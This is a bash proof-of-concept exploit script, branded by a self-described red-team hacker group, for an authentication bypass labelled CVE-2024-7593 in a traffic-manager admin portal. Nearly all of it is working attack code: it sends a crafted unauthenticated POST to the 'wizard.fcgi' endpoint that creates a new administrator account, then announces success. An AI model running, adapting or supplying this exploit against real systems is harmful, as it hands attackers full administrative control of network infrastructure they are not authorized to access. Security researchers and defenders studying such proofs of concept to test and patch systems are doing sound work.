#!/bin/bash
# CVE-2024-7593 PoC
# Red Team 4TW | RB Hackers Team.

YELLOW='\033[0;33m'
FAST_BLINK='\033[6m'
BRIGHT_GREEN='\033[1;32m'
RESET='\033[0m'

banner(){

printf "
${YELLOW}
   _______    ________    ___   ____ ___  __ __     _______________ _____    ____        ______
  / ____/ |  / / ____/   |__ \ / __ \__ \/ // /    /__  / ____/ __ \__  /   / __ \____  / ____/
 / /    | | / / __/________/ // / / /_/ / // /_______/ /___ \/ /_/ //_ <   / /_/ / __ \/ /
/ /___  | |/ / /__/_____/ __// /_/ / __/__  __/_____/ /___/ /\__, /__/ /  / ____/ /_/ / /___
\____/  |___/_____/    /____/\____/____/ /_/       /_/_____//____/____/  /_/    \____/\____/
\r\n${RESET}
"

printf "PoC for: https://www.cve.org/CVERecord?id=CVE-2024-7593\r\n"
printf "Author: D3N14LD15K\r\n\r\n"

}

usage() {
    banner
    printf "Usage: $0 -u <host> -p <port>"
    exit 1
}

command -v curl >/dev/null 2>&1 || { echo >&2 "Curl is not installed. Aborting."; exit 1; }

while getopts ":u:p:" opt; do
    case $opt in
        u) host="$OPTARG" ;;
        p) port="$OPTARG" ;;
        *) usage ;;
    esac
done

if [ -z "$host" ] || [ -z "$port" ]; then
    usage
fi

banner

read -p "New username: " new_admin_name
read -s -p "New password: " new_admin_password

admin_portal="https://$host:$port"

params="error=1&section=Access%20Management:LocalUsers"
data="_form_submitted=form&create_user=Create&group=admin&newusername=$new_admin_name&password1=$new_admin_password&password2=$new_admin_password"

response=$(curl -s -k -X POST "$admin_portal/apps/zxtm/wizard.fcgi?$params" -d "$data")

if [[ $(echo "$response" | grep -c '<title>2<') -gt 0 ]]; then
    printf "${YELLOW}\r\n\r\nLogin with username '$new_admin_name' and password '$new_admin_password'\r\n\r\n${RESET}"
    printf "${BRIGHT_GREEN}${FAST_BLINK}Exploit Success. Login with your new credentials.\r\n\r\n${RESET}"
else
    printf "\r\n\r\nUnable to create new user\r\n\r\n"
fi